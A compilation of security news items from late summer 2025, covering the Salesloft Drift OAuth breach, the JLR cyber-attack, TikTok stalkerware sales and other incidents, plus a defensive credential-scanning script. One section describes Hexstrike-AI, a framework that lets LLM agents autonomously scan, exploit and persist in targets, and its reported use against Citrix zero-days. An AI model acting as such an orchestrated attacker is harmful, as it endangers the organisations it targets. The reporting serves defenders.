A Primer on Forensic Investigation of Salesforce Security Incidents
salesforce.com Eoghan Casey August 27, 2025
Learn how to detect, investigate, and respond to Salesforce security incidents with logs, permissions, and backups. A guide to investigating Salesforce security incidents with logs, permissions, and backups to strengthen response and resilience.
I am increasingly asked by customers how to investigate potential security incidents in their Salesforce environments. Common questions are: "What did a specific user do during that time?" and "What data was impacted?" Every organization and incident is unique, and the answer to these questions depends on the specific situation, but there is some general guidance I can provide. Three key sources of information for investigating a security incident in Salesforce environments are activity logs, user permissions, and backup data.
Jaguar Land Rover production severely hit by cyber attack
bbc.com Chris Vallance, Senior Technology Reporter, and Theo Leggett, International Business Correspondent 3.09.2025
Staff were sent home and the company shut down its IT systems in an effort to minimise the damage done.
A cyber-attack has "severely disrupted" Jaguar Land Rover (JLR) vehicle production, including at its two main UK plants. The company, which is owned by India's Tata Motors, said it took immediate action to lessen the impact of the hack and is working quickly to restart operations.
JLR's retail business has also been badly hit at a traditionally popular time for consumers to take delivery of a new vehicle - but there is no evidence any customer data had been stolen, it said. The attack began on Sunday as the latest batch of new registration plates became available on Monday, 1 September.
The BBC understands that the attack was detected while in progress, and the company shut down its IT systems in an effort to minimise any damage. Workers at the company's Halewood plant in Merseyside were told by email early on Monday morning not to come into work while others were sent home, as first reported by the Liverpool Echo. The BBC understands the attack has also hit JLR's other main UK manufacturing plant at Solihull, with staff there also sent home.
The company said: "We took immediate action to mitigate its impact by proactively shutting down our systems. We are now working at pace to restart our global applications in a controlled manner." It added: "At this stage there is no evidence any customer data has been stolen but our retail and production activities have been severely disrupted."
It is not yet known who is responsible for the hack, but it follows crippling attacks on prominent UK retail businesses including Marks & Spencer and the Co-op. In both cases, the hackers sought to extort money.
While JLR's statement makes no mention of a cyber-attack, a separate filing by parent company Tata Motors to the Bombay Stock Exchange referred to an "IT security incidence" causing "global" issues. The National Crime Agency said: "We are aware of an incident impacting Jaguar Land Rover and are working with partners to better understand its impact."
In 2023, as part of an effort to "accelerate digital transformation across its business", JLR signed a five-year, £800m deal with corporate stablemate Tata Consultancy Services to provide cybersecurity and a range of other IT services. The halt in production is a fresh blow to the firm, which recently revealed a slump in profits attributed to increasing costs caused by US tariffs.
Zscaler, Palo Alto Networks, SpyCloud among the affected by Salesloft Drift breach - Help Net Security
helpnetsecurity.com Zeljka Zorz, Editor-in-Chief, Help Net Security September 2, 2025
Zscaler, Palo Alto Networks, PagerDuty, Tanium, and SpyCloud say their Salesforce instances were accessed following the Salesloft breach. The companies noted that attackers had only limited access to Salesforce databases, not to other systems or resources. They warned, however, that the stolen customer data could be used for convincing phishing and social engineering attacks.
The Salesloft breach
Salesloft is the company behind a popular sales engagement platform of the same name. The company’s Drift application – an AI chat agent – can be integrated with many third-party platforms and tools, including Salesforce.
On August 26, Salesloft stated that from August 8 to August 18, 2025, attackers used compromised OAuth credentials to exfiltrate data from the Salesforce instances of customers that have set up the Drift-Salesforce integration. Several days later, the Google Threat Intelligence Group (GTIG) confirmed that the compromise impacted other integrations, as well.
“On August 28, 2025, our investigation confirmed that the actor also compromised OAuth tokens for the ‘Drift Email’ integration. On August 9, 2025, a threat actor used these tokens to access email from a very small number of Google Workspace accounts,” GTIG analysts shared.
Astrix Security researchers have confirmed that the attackers used the Drift Email OAuth application for Google Workspace to exfiltrate emails and that – at least in one case – they tried to access S3 buckets whose names have likely been extracted from compromised Salesforce environments. Similarly, WideField threat researchers have observed suspicious log event activity across multiple customers using its security platform, pointing to attackers rifling through Salesforce databases and Gmail accounts.
Figure: How UNC6395 accessed emails (Source: WideField)
Zscaler, Palo Alto Networks and the other companies mentioned above are just some of the 700+ companies impacted by this breach. While the stolen customer information can be valuable, GTIG analysts say that the attackers were focused on searching for AWS access keys, passwords, and Snowflake-related access tokens, which can be (and likely have been) further misused by the attackers.
What to do if your organization is on the victims list?
Salesloft has yet to reveal how the attackers managed to get their hands on the OAuth tokens they used, but the company has engaged cybersecurity experts from (Google’s) Mandiant and Coalition to help them investigate and remediate the compromise.
“We are recommending that all Drift customers who manage their own Drift connections to third-party applications via API key, proactively revoke the existing key and reconnect using a new API key for these applications. This only relates to API key-based Drift integrations. OAuth applications are being handled directly by Salesloft,” the company said on August 27, and outlined the process for updating the API keys.
Salesforce has, for the moment, disabled all integrations between Salesforce and Salesloft technologies, including the Drift app. “Disabling the connection is a precautionary measure to help safeguard customer environments while we continue to assess and address the situation. We recognize this change may cause disruption and will provide further updates as more information becomes available,” the company noted.
Likewise, Google has disabled the integration functionality between Google Workspace and Salesloft Drift pending further investigation, and has advised organizations to “review all third-party integrations connected to their Drift instance, revoke and rotate credentials for those applications, and investigate all connected systems for signs of unauthorized access.”
Google Mandiant incident responders have provided extensive advice on how organizations can investigate for compromise and scan for exposed secrets and hardcoded credentials. Astrix researchers have shared additional indicators of compromise and described AWS-specific activity to look out for. WideField threat analysts have provided guidance useful to both their customers and other affected organizations.
blog.checkpoint.com By Amit Weigman | Office of the CTO September 2, 2025
Researchers analyze Hexstrike-AI, a next-gen AI orchestration framework linking LLMs with 150+ security tools—now repurposed by attackers to weaponize Citrix NetScaler zero-day CVEs in minutes.
Key Findings:
- Newly released framework called Hexstrike-AI provides threat actors with an orchestration “brain” that can direct more than 150 specialized AI agents to autonomously scan, exploit, and persist inside targets.
- Within hours of its release, dark web chatter shows threat actors attempting to use HexStrike-AI to go after recent zero-day CVEs, with attackers dropping webshells for unauthenticated remote code execution.
- These vulnerabilities are complex and require advanced skills to exploit. With Hexstrike-AI, threat actors claim to reduce the exploitation time from days to under 10 minutes.
From Concept to Reality
A recent executive insight blog examined the idea of a “brain” behind next-generation cyber attacks: an orchestration and abstraction layer coordinating large numbers of specialized AI agents to launch complex operations at scale. That architecture was already beginning to appear in offensive campaigns, signaling a shift in how threat actors organize and execute attacks.
The emergence of Hexstrike-AI now provides the clearest embodiment of that model to date. This tool was designed to be a defender-oriented framework: “a revolutionary AI-powered offensive security framework that combines professional security tools with autonomous AI agents to deliver comprehensive security testing capabilities”, their website reads. In this context, Hexstrike-AI was positioned as a next-generation tool for red teams and security researchers. But almost immediately after release, malicious actors began discussing how to weaponize it.
Within hours, certain underground channels discussed application of the framework to exploit the Citrix NetScaler ADC and Gateway zero-day vulnerabilities disclosed last Tuesday (08/26). This marks a pivotal moment: a tool designed to strengthen defenses has been claimed to be rapidly repurposed into an engine for exploitation, crystallizing earlier concepts into a widely available platform driving real-world attacks.
Figure 1: Dark web posts discussing HexStrike AI, shortly after its release.
The Architecture of Hexstrike-AI
Hexstrike-AI is not “just another red-team framework.” It represents a fundamental shift in how offensive cyber operations can be conducted. At its heart is an abstraction and orchestration layer that allows AI models like Claude, GPT, and Copilot to autonomously run security tooling without human micromanagement.
Figure 2: HexStrike AI MCP Toolkit.
More specifically, Hexstrike AI introduces MCP Agents, an advanced server that bridges large language models with real-world offensive capabilities. Through this integration, AI agents can autonomously run 150+ cyber security tools spanning penetration testing, vulnerability discovery, bug bounty automation, and security research.
Think of it as the conductor of an orchestra:
- The AI orchestration brain interprets operator intent.
- The agents (150+ tools) perform specific actions: scanning, exploiting, deploying persistence, exfiltrating data.
- The abstraction layer translates vague commands like “exploit NetScaler” into precise, sequenced technical steps that align with the targeted environment.
This mirrors exactly the concept described in our recent blog: an orchestration brain that removes friction, decides which tools to deploy, and adapts dynamically in real time.
We analyzed the source code and architecture of Hexstrike-AI and revealed several important aspects of its design:
MCP Orchestration Layer
The framework sets up a FastMCP server that acts as the communication hub between large language models (Claude, GPT, Copilot) and tool functions. Tools are wrapped with MCP decorators, exposing them as callable components that AI agents can invoke. This is the orchestration core; it binds the AI agent to the underlying security tools, so commands can be issued programmatically.
Tool Integration at Scale
Hexstrike-AI incorporates core network discovery and exploitation tools, beginning with Nmap scanning and extending to dozens of other reconnaissance, exploitation, and persistence modules. Each tool is abstracted into a standardized function, making orchestration seamless.
Figure 3: the nmap_scan tool is exposed as an MCP function.
Here, AI agents can call nmap_scan with simple parameters. The abstraction removes the need for an operator to run and parse Nmap manually — orchestration handles execution and results.
Automation and Resilience
The client includes retry logic and recovery handling to keep operations stable, even under failure conditions. This ensures operations continue reliably, a critical feature when chaining scans, exploits, and persistence attempts.
Figure 4: Hexstrike-AI’s automated resilience loop
Intent-to-Execution Translation
High-level commands are abstracted into workflows. The execute_command function demonstrates this. Here, an AI agent provides only a command string, and Hexstrike-AI determines how to execute it, turning intent into precise, repeatable tool actions.
Figure 5: Hexstrike-AI’s execute_command function.
Why This Matters Right Now
The release of Hexstrike-AI would be concerning in any context, because its design makes it extremely attractive to attackers. But its impact is amplified by timing.
Last Tuesday (08/26), Citrix disclosed three zero-day vulnerabilities affecting NetScaler ADC and NetScaler Gateway appliances, as follows:
- CVE-2025-7775 – Unauthenticated remote code execution. Already exploited in the wild, with webshells observed on compromised appliances.
- CVE-2025-7776 – A memory-handling flaw impacting NetScaler’s core processes. Exploitation not yet confirmed, but high-risk.
- CVE-2025-8424 – An access control weakness on management interfaces. Also unconfirmed in the wild but exposes critical control paths.
Exploiting these vulnerabilities is non-trivial. Attackers must understand memory operations, authentication bypasses, and the peculiarities of NetScaler’s architecture. Such work has historically required highly skilled operators and weeks of development.
With Hexstrike-AI, that barrier seems to have collapsed. In underground forums over the 12 hours following the disclosure of these vulnerabilities, we have observed threat actors discussing the use of Hexstrike-AI to scan for and exploit vulnerable NetScaler instances. Instead of painstaking manual development, AI can now automate reconnaissance, assist with exploit crafting, and facilitate payload delivery for these critical vulnerabilities.
Figure 6: Top Panel: Dark web post claiming to have successfully exploited the latest Citrix CVEs using HexStrike AI, originally in Russian; Bottom Panel: Dark web post translated into English using Google Translate add-on.
Certain threat actors have also published vulnerable instances they have been able to scan using the tool, which are now being offered for sale. The implications are profound:
- A task that might take a human operator days or weeks can now be initiated in under 10 minutes.
- Exploitation can be parallelized at scale, with agents scanning thousands of IPs simultaneously.
- Decision-making becomes adaptive; failed exploit attempts can be automatically retried with variations until successful, increasing the overall exploitation yield.
The window between disclosure and mass exploitation shrinks dramatically. CVE-2025-7775 is already being exploited in the wild, and with Hexstrike-AI, the volume of attacks will only increase in the coming days.
Figure 7: Seemingly vulnerable NetScaler instances curated by HexStrike AI.
Action Items for Defenders
The immediate priority is clear: patch and harden affected systems. Citrix has already released fixed builds, and defenders must act without delay. In our technical vulnerability report, we have listed technical measures and actions defenders should take against these CVEs, mostly including hardening authentication, restricting access and threat hunting for the affected webshells.
However, Hexstrike-AI represents a broader paradigm shift, where AI orchestration will increasingly be used to weaponize vulnerabilities quickly and at scale. To defend against this new class of threat, organizations must evolve their defenses accordingly:
- Adopt adaptive detection: Static signatures and rules will not suffice. Detection systems must ingest fresh intelligence, learn from ongoing attacks, and adapt dynamically.
- Integrate AI-driven defense: Just as attackers are building orchestration layers, defenders must deploy AI systems capable of correlating telemetry, detecting anomalies, and responding autonomously at machine speed.
- Shorten patch cycles: When the time-to-exploit is measured in hours, patching cannot be a weeks-long process. Automated patch validation and deployment pipelines are essential.
- Threat intelligence fusion: Monitoring dark web discussions and underground chatter is now a critical defensive input. Early signals, such as the chatter around Hexstrike-AI and NetScaler CVEs, provide vital lead time for professionals.
- Resilience engineering: Assume compromise. Architect systems with segmentation, least privilege, and robust recovery capabilities so that successful exploitation does not equate to catastrophic impact.
Conclusion
Hexstrike-AI is a watershed moment. What was once a conceptual architecture – a central orchestration brain directing AI agents – has now been embodied in a working tool. And it is already being applied against active zero days.
For defenders, we can only reinforce what has already been said in our last post: urgency in addressing today’s vulnerabilities, and foresight in preparing for a future where AI-driven orchestration is the norm. The sooner the security community adapts, patching faster, detecting smarter, a...
TikTok Shop offers an AirTag lookalike for spying on your loved ones...
clubic.com By Alexandre Boero, journalist-reporter, head of news. Published September 1, 2025 at 08:04
The TikTok Shop platform sells GPS trackers that resemble Apple's well-known AirTag through viral videos that encourage spying on one's loved ones or partner. Sales have reportedly already passed 100,000 units.
TikTok's marketplace hosts sellers of AirTag-style geolocation devices. The merchants make their sales with advertising pitches that directly encourage secretly monitoring one's partner. Videos with millions of views, tens of thousands of sales, and failing moderation despite warnings have been reported in the United States. While the Chinese platform says it bans this content, it visibly struggles to remove it, which helps normalize abusive behavior on the famous social network.
Videos with several million views normalize spousal spying on TikTok
According to the investigation recently carried out by 404 Media, the GPS tracker sellers fully embrace their toxic positioning. "If your girlfriend says she's just going out with friends every night, you'd better stick one of these on her car," can be heard in a video viewed millions of times. The device, flatly presented as undetectable unlike AirTags, dangles worldwide surveillance before potential buyers, thanks to its built-in SIM card.
The interactions under these posts are telling. One user confides in the comments: "I bought some and put them on the cars of girls I find attractive at the gym." Yes, it's creepy, especially when the seller responds casually with a laughing emoji. According to TikTok Shop's metrics, one of the trackers has sold more than 32,500 units, while another shows nearly 100,000 units sold.
Eva Galperin, co-founder of the Coalition Against Stalkerware, the coalition against spyware, is dismayed. "It is quite simply presented as a tool of abuse." She explains that any device justified by "catching your partner cheating" facilitates coercive control. Worst of all, the videos multiply pretexts to try to reach more users, such as marital distrust, references to Coldplay and the former Astronomer boss caught by a kiss cam, all with hooks like "men with cheating wives, you might want one of these."
TikTok removes a few videos but the problem persists
Questioned by 404 Media, TikTok removed some videos and banned one account, adding that it prohibits "content that encourages secret surveillance." Yet the day after that response, the outlet found identical videos that remained accessible. As soon as a user clicks on one of these videos, the TikTok Shop algorithm recommends similar products, notably secret audio recorders sold with the same toxic pitches.
In the United States, where the videos in question were published, eleven states explicitly prohibit GPS tracking in their anti-stalking laws, and fifteen consider vehicle surveillance without consent illegal. The sellers play on the ambiguity. Some even go as far as using irony in their video: "Is it illegal to track people? I don't know, I'm not a lawyer, but you'll probably get in trouble." There's no stopping progress, and even less the abuses.
Cloudflare hit by data breach in Salesloft Drift supply chain attack
bleepingcomputer.com By Sergiu Gatlan September 2, 2025
Cloudflare is the latest company impacted in a recent string of Salesloft Drift breaches, part of a supply-chain attack disclosed last week.
The internet giant revealed on Tuesday that the attackers gained access to a Salesforce instance it uses for internal customer case management and customer support, which contained 104 Cloudflare API tokens.
Cloudflare was notified of the breach on August 23, and it alerted impacted customers of the incident on September 2. Before informing customers of the attack, it also rotated all 104 Cloudflare platform-issued tokens exfiltrated during the breach, even though it has yet to discover any suspicious activity linked to these tokens.
"Most of this information is customer contact information and basic support case data, but some customer support interactions may reveal information about a customer's configuration and could contain sensitive information like access tokens," Cloudflare said.
"Given that Salesforce support case data contains the contents of support tickets with Cloudflare, any information that a customer may have shared with Cloudflare in our support system—including logs, tokens or passwords—should be considered compromised, and we strongly urge you to rotate any credentials that you may have shared with us through this channel."
The company's investigation found that the threat actors stole only the text contained within the Salesforce case objects (including customer support tickets and their associated data, but no attachments) between August 12 and August 17, after an initial reconnaissance stage on August 9.
These exfiltrated case objects contained only text-based data, including:
- The subject line of the Salesforce case
- The body of the case (which may include keys, secrets, etc., if provided by the customer to Cloudflare)
- Customer contact information (for example, company name, requester's email address and phone number, company domain name, and company country)
"We believe this incident was not an isolated event but that the threat actor intended to harvest credentials and customer information for future attacks," Cloudflare added.
"Given that hundreds of organizations were affected through this Drift compromise, we suspect the threat actor will use this information to launch targeted attacks against customers across the affected organizations."
Wave of Salesforce data breaches
Since the start of the year, the ShinyHunters extortion group has been targeting Salesforce customers in data theft attacks, using voice phishing (vishing) to trick employees into linking malicious OAuth apps with their company's Salesforce instances. This tactic enabled the attackers to steal databases, which were later used to extort victims.
Since Google first wrote about these attacks in June, numerous data breaches have been linked to ShinyHunters' social engineering tactics, including those targeting Google itself, Cisco, Qantas, Allianz Life, Farmers Insurance, Workday, Adidas, as well as LVMH subsidiaries Louis Vuitton, Dior, and Tiffany & Co.
While some security researchers have told BleepingComputer that the Salesloft supply chain attacks involve the same threat actors, Google has found no conclusive evidence linking them.
Palo Alto Networks also confirmed over the weekend that the threat actors behind the Salesloft Drift breaches stole some support data submitted by customers, including contact info and text comments.
The Palo Alto Networks incident was also limited to its Salesforce CRM and, as the company told BleepingComputer, it did not affect any of its products, systems, or services.
The cybersecurity company observed the attackers searching for secrets, including AWS access keys (AKIA), VPN and SSO login strings, Snowflake tokens, as well as generic keywords such as "secret," "password," or "key," which could be used to breach more cloud platforms to steal data in other extortion attacks.
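The article above reports that the actor searched support case text for AWS access keys (AKIA), VPN and SSO strings, Snowflake tokens and the words "secret," "password" and "key." As an added example (not code from Cloudflare, Palo Alto Networks or BleepingComputer), the following Python triages an organization's own exported case text for the same terms so it can decide which credentials to rotate. The record layout, field names, sample cases and the AKIA regular expression are assumptions constructed for illustration.

```python
import re

# Assumption: long-term AWS access key IDs are "AKIA" plus 16 upper-case
# alphanumerics (the commonly used detection pattern).
AWS_KEY_ID = re.compile(r"\bAKIA[0-9A-Z]{16}\b")

# Terms the article says the attackers searched for. Letter-only lookarounds
# let "api_key=" match while "keyboard" does not; a plural "s" is allowed.
KEYWORDS = re.compile(
    r"(?<![A-Za-z])(secret|password|key|snowflake|vpn|sso)s?(?![A-Za-z])",
    re.IGNORECASE,
)

# Constructed sample export of case objects (text fields only, as in the
# incident). The key below is the placeholder value used in AWS documentation.
SAMPLE_CASES = [
    {"Id": "CASE-0001", "Subject": "Upload failing",
     "Description": "Sync fails. We use AKIAIOSFODNN7EXAMPLE with password: hunter2"},
    {"Id": "CASE-0002", "Subject": "Billing question",
     "Description": "Please resend the July invoice."},
    {"Id": "CASE-0003", "Subject": "SSO login broken",
     "Description": "Our Snowflake connector stopped after the VPN change."},
]


def redact(value, keep=4):
    """Keep only a short prefix so the report does not re-leak the secret."""
    return value[:keep] + "*" * (len(value) - keep)


def scan_case(case):
    """Return findings for one case: credential-shaped strings and keywords."""
    findings = []
    for field in ("Subject", "Description"):
        text = case.get(field) or ""
        for m in AWS_KEY_ID.finditer(text):
            findings.append({"field": field, "kind": "aws_access_key_id",
                             "match": redact(m.group())})
        for m in KEYWORDS.finditer(text):
            findings.append({"field": field, "kind": "keyword",
                             "match": m.group(1).lower()})
    return findings


def triage(cases):
    """Map case Id -> severity and findings; cases with no hits are omitted.

    'rotate' means a credential-shaped value was present in the text;
    'review' means only a keyword matched and a person should read the case.
    """
    report = {}
    for case in cases:
        findings = scan_case(case)
        if not findings:
            continue
        has_credential = any(f["kind"] != "keyword" for f in findings)
        report[case["Id"]] = {
            "severity": "rotate" if has_credential else "review",
            "findings": findings,
        }
    return report


if __name__ == "__main__":
    for case_id, entry in triage(SAMPLE_CASES).items():
        hits = ", ".join(f"{f['kind']}={f['match']}" for f in entry["findings"])
        print(f"{case_id}: {entry['severity']} ({hits})")
```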
Spanish government cancels €10m contract using Huawei equipment
therecord.media | The Record from Recorded Future News September 1st, 2025
Last week, a contract worth €10 million ($11.7 million) had been awarded to the Spanish multinational Telefónica to use Huawei kit to upgrade the RedIRIS network, effectively more than 16,000km of infrastructure. On Friday, the government reversed course for “reasons of digital strategy and strategic autonomy,” as reported by El País.
The RedIRIS upgrade using Huawei equipment had been negotiated directly with Telefónica as the company had an existing €5.5 million contract from 2020 to boost the network. The Ministry of Digital Transformation argued the new upgrade was urgent due to the demands of new digital services, supercomputing projects and the network’s connections to Spain’s defense establishment.
It was partially driven by a need to improve the RedIRIS network’s resilience to cyberattacks, despite concerns that the use of equipment provided by Chinese vendors could increase the risk of cyberattacks to Western infrastructure. These fears are often expressed in the context of Beijing’s offensive cyber espionage activities and China’s National Intelligence Law of 2017, which allows the state to “compel anyone in China to do anything,” as summarized by Britain’s National Cyber Security Centre.
Huawei has consistently argued that such criticisms are illegitimate. The company is currently restricted from most 5G networks across the European Union, although Spain has opted out of imposing such restrictions, and faces varying levels of bans in networks of NATO allies such as the United States and the United Kingdom.
Despite the apparent political hesitation regarding restricting Huawei equipment, Spain was among more than a dozen allies who last week warned about Chinese companies compromising global critical infrastructure.
The cancellation of the Telefónica contract comes amid alarm from Madrid’s allies about the prevalence of the Chinese company’s equipment within the Spanish telecommunications infrastructure, including the core of Telefónica’s 5G network.
In July, the chairs of the U.S. House and Senate Intelligence panels asked the country’s spy chief to scrutinize any intelligence information the U.S. shares with Spain after the disclosure the country’s wiretap system is underpinned by Huawei technology.
Spanish Prime Minister Pedro Sánchez, who has been among the EU’s most supportive leaders regarding Huawei, has pushed back against the bloc’s efforts to restrict it from 5G networks. Huawei has opened research facilities in Madrid and is a major employer as a technology contractor for a number of public administrations.
Natasha Buckley, a researcher at RUSI and lecturer in cybersecurity at Cranfield University, previously told Recorded Future News that Spain’s approach to the company stood in stark contrast to that of other NATO allies and many EU member states.
“Spain’s stance on high-risk technology vendors places greater emphasis on supply chain reliability than on geopolitical considerations, setting it apart from more restrictive approaches seen in countries like the UK, the Netherlands and Poland.
“While the EU’s 5G Cybersecurity Toolbox recommends limiting or excluding high-risk Chinese suppliers like Huawei, Spain’s implementation has been uneven. Huawei is restricted from some public 5G projects, yet its servers have been approved to store sensitive police wiretap data. The result is a case-by-case approach that falls short of a clearly defined policy towards high-risk vendors,” Buckley said.
U.S. Government Seizes Online Marketplaces Selling Fraudulent Identity Documents Used in Cybercrime Schemes
justice.gov | District of New Mexico | United States Department of Justice | Thursday, August 28, 2025
The operators of VerifTools produced and sold counterfeit driver’s licenses, passports, and other identification documents that could be used to bypass identity verification systems and gain unauthorized access to online accounts.
ALBUQUERQUE – The U.S. Attorney’s Office for the District of New Mexico announced today the seizure of two marketplace domains and one blog used to sell fraudulent identity documents to cybercriminals worldwide.
The Federal Bureau of Investigation (FBI) began investigating in August 2022 after discovering a conspiracy to use stolen identity information to access cryptocurrency accounts. The investigation revealed that VerifTools offered counterfeit identification documents for all 50 U.S. states and multiple foreign countries for as little as nine dollars, payable in cryptocurrency.
The FBI used the VerifTools marketplace to generate and purchase counterfeit New Mexico driver’s licenses, which were paid for with cryptocurrency. The FBI has identified the equivalent of approximately $6.4 million of illicit proceeds linked to the VerifTools marketplace. The following counterfeit documents are an example of New Mexico driver’s licenses obtained from VerifTools.
“The internet is not a refuge for criminals. If you build or sell tools that let offenders impersonate victims, you are part of the crime,” said Acting U.S. Attorney Ryan Ellison. “We will use every lawful tool to disrupt your business, take the profit out of it, and bring you to justice. No one operation is bigger than us together. With our partners at every level of law enforcement we will protect New Mexicans and defend those who stand up for our community.”
"The removal of this marketplace is a major step in protecting the public from fraud and identity theft crime," said Philip Russell, Acting Special Agent in Charge of the FBI Albuquerque Division. "Together with our partners, we will continue to target and dismantle the platforms that criminals depend on, no matter where they operate."
Acting U.S. Attorney Ryan Ellison and Acting Special Agent in Charge Philip Russell of the FBI’s Albuquerque Field Office made the announcement today.
The FBI’s Albuquerque Field Office investigated this case. The Justice Department’s Office of International Affairs provided valuable assistance. The Justice Department collaborated closely with investigators and prosecutors from multiple jurisdictions in this investigation, including the District of New Mexico, Eastern District of Virginia, the Dutch National Police and the Netherlands Public Prosecution Service.
Google URL Shortener links will no longer be available [updated] - Google Developers Blog
developers.googleblog.com JULY 18, 2024 Sumit Chandel Developer Relations Engineer Understand how you will be impacted by our decision to turn off the serving portion of Google URL Shortener. Updated August 1, 2025: While we previously announced discontinuing support for all goo.gl URLs after August 25, 2025, we've adjusted our approach in order to preserve actively used links. We understand these links are embedded in countless documents, videos, posts and more, and we appreciate the input received. Nine months ago, we redirected URLs that showed no activity in late 2024 to a message specifying that the link would be deactivated in August, and these are the only links targeted to be deactivated. If you get a message that states, “This link will no longer work in the near future”, the link won't work after August 25 and we recommend transitioning to another URL shortener if you haven’t already. All other goo.gl links will be preserved and will continue to function as normal. To check if your link will be retained, visit the link today. If your link redirects you without a message, it will continue to work. In 2018, we announced the deprecation and transition of Google URL Shortener because of the changes we’ve seen in how people find content on the internet, and the number of new popular URL shortening services that emerged in that time. This meant that we no longer accepted new URLs to shorten but that we would continue serving existing URLs. Over time, these existing URLs saw less and less traffic as the years went on - in fact more than 99% of them had no activity in the last month. As such, we will be turning off Google URL Shortener. Please read on below to understand more about how this may impact you. Who is impacted? Any developers using links built with the Google URL Shortener in the form https://goo.gl/* will be impacted, and these URLs will no longer return a response after August 25th, 2025. 
We recommend transitioning these links to another URL shortener provider. Note that goo.gl links generated via Google apps (such as Maps sharing) will continue to function. What to expect Starting August 23, 2024, goo.gl links will start displaying an interstitial page for a percentage of existing links notifying your users that the link will no longer be supported after August 25th, 2025 prior to navigating to the original target page. Over time the percentage of links that will show the interstitial page will increase until the shutdown date. This interstitial page should help you track and adjust any affected links that you will need to transition as part of this change. We will continue to display this interstitial page until the shutdown date after which all links served will return a 404 response. Note that the interstitial page may cause disruptions in the current flow of your goo.gl links. For example, if you are using other 302 redirects, the interstitial page may prevent the redirect flow from completing correctly. If you’ve embedded social metadata in your destination page, the interstitial page will likely cause these to no longer show up where the initial link is displayed. For this reason, we advise transitioning these links as soon as possible. Note: In the event the interstitial page is disrupting your use cases, you can suppress it by adding the query param “si=1” to existing goo.gl links. We understand the transition away from using goo.gl short links may cause some inconvenience. If you have any questions or concerns, please reach out to us at Firebase Support. Thank you for using the service and we hope you join us in moving forward into new and innovative ways for navigating web and app experiences.
Salesloft Drift Supply Chain Incident: Key Details and Zscaler’s
zscaler.com August 30, 2025 Zscaler swiftly mitigates a security incident impacting Salesloft Drift, ensuring robust protection against potential vulnerabilities. At Zscaler, protecting your data and maintaining transparency are core to our mission to secure, simplify and accelerate business transformation. We are committed to keeping you informed about key developments that may impact your organization. What Happened? Zscaler was made aware of a campaign targeted at Salesloft Drift (marketing software-as-a-service) and impacting a large number of Salesforce customers. This incident involved the theft of OAuth tokens connected to Salesloft Drift, a third-party application used for automating sales workflows that integrates with Salesforce databases to manage leads and contact information. The scope of the incident is confined to Salesforce and does not involve access to any of Zscaler's products, services or underlying systems and infrastructure. As part of this campaign, unauthorized actors gained access to Salesloft Drift credentials of its customers including Zscaler. Following a detailed review as part of our ongoing investigation, we have determined that these credentials have allowed limited access to some Zscaler Salesforce information. What Information May Be Affected? The information accessed was limited to commonly available business contact details for points of contact and specific Salesforce related content, including: names; business email addresses; job titles; phone numbers; regional/location details; Zscaler product licensing and commercial information; and plain text content from certain support cases [this does NOT include attachments, files, and images]. After extensive investigation, Zscaler has currently found no evidence to suggest misuse of this information. If anything changes, we will provide further communications and updates. What Did Zscaler Do? Zscaler acted swiftly to address the incident and mitigate risks. 
Steps taken include: revoking Salesloft Drift’s access to Zscaler’s Salesforce data; out of an abundance of caution, rotating other API access tokens; launching a detailed investigation into the scope of the event, working closely with Salesforce to assess and understand impacts as they continue investigating; implementing additional safeguards and strengthening protocols to defend against similar incidents in the future; and immediately launching a third party risk management investigation for third party vendors used by Zscaler. The Zscaler Customer Support team has also further strengthened its customer authentication protocol when responding to customer calls to safeguard against potential phishing attacks. What You Can Do: Although the incident’s scope remains limited (as stated above) and no evidence of misuse has been found, we recommend that customers maintain heightened vigilance. Please be wary of potential phishing attacks or social engineering attempts, which could leverage exposed contact details. Given that other organizations have suffered similar incidents stemming from Salesloft Drift, it’s crucial to exercise caution regarding unsolicited communications, including emails, phone calls, or requests for sensitive information. Always verify the source of communication and never disclose passwords or financial data via unofficial channels. Zscaler Support will never request authentication or authorization details through unsolicited outreach, including phone calls or SMS. All official Zscaler communications come from trusted Zscaler channels. Please exercise caution and report any suspicious phishing activity to security@zscaler.com.
OpenAI Says It's Scanning Users' ChatGPT Conversations and Reporting Content to the Police
futurism.com Aug 27, 5:05 PM EDT by Noor Al-Sibai OpenAI has authorized itself to call law enforcement if users say threatening enough things when talking to ChatGPT. Update: It looks like this may have been OpenAI's attempt to get ahead of a horrifying story that just broke, about a man who fell into AI psychosis and killed his mother in a murder-suicide. Full details here. For the better part of a year, we've watched — and reported — in horror as more and more stories emerge about AI chatbots leading people to self-harm, delusions, hospitalization, arrest, and suicide. As the loved ones of the people impacted by these dangerous bots rally for change to prevent such harm from happening to anyone else, the companies that run these AIs have been slow to implement safeguards — and OpenAI, whose ChatGPT has been repeatedly implicated in what experts are now calling "AI psychosis," has until recently done little more than offer copy-pasted promises. In a new blog post admitting certain failures amid its users' mental health crises, OpenAI also quietly disclosed that it's now scanning users' messages for certain types of harmful content, escalating particularly worrying content to human staff for review — and, in some cases, reporting it to the cops. "When we detect users who are planning to harm others, we route their conversations to specialized pipelines where they are reviewed by a small team trained on our usage policies and who are authorized to take action, including banning accounts," the blog post notes. "If human reviewers determine that a case involves an imminent threat of serious physical harm to others, we may refer it to law enforcement." That short and vague statement leaves a lot to be desired — and OpenAI's usage policies, referenced as the basis on which the human review team operates, don't provide much more clarity. 
When describing its rule against "harm [to] yourself or others," the company listed off some pretty standard examples of prohibited activity, including using ChatGPT "to promote suicide or self-harm, develop or use weapons, injure others or destroy property, or engage in unauthorized activities that violate the security of any service or system." But in the post warning users that the company will call the authorities if they seem like they're going to hurt someone, OpenAI also acknowledged that it is "currently not referring self-harm cases to law enforcement to respect people’s privacy given the uniquely private nature of ChatGPT interactions." While ChatGPT has in the past proven itself pretty susceptible to so-called jailbreaks that trick it into spitting out instructions to build neurotoxins or step-by-step instructions to kill yourself, this new rule adds an additional layer of confusion. It remains unclear which exact types of chats could result in user conversations being flagged for human review, much less getting referred to police. We've reached out to OpenAI to ask for clarity. While it's certainly a relief that AI conversations won't result in police wellness checks — which often end up causing more harm to the person in crisis due to most cops' complete lack of training in handling mental health situations — it's also kind of bizarre that OpenAI even mentions privacy, given that it admitted in the same post that it's monitoring user chats and potentially sharing them with the fuzz. To make the announcement all the weirder, this new rule seems to contradict the company's pro-privacy stance amid its ongoing lawsuit with the New York Times and other publishers as they seek access to troves of ChatGPT logs to determine whether any of their copyrighted data had been used to train its models. 
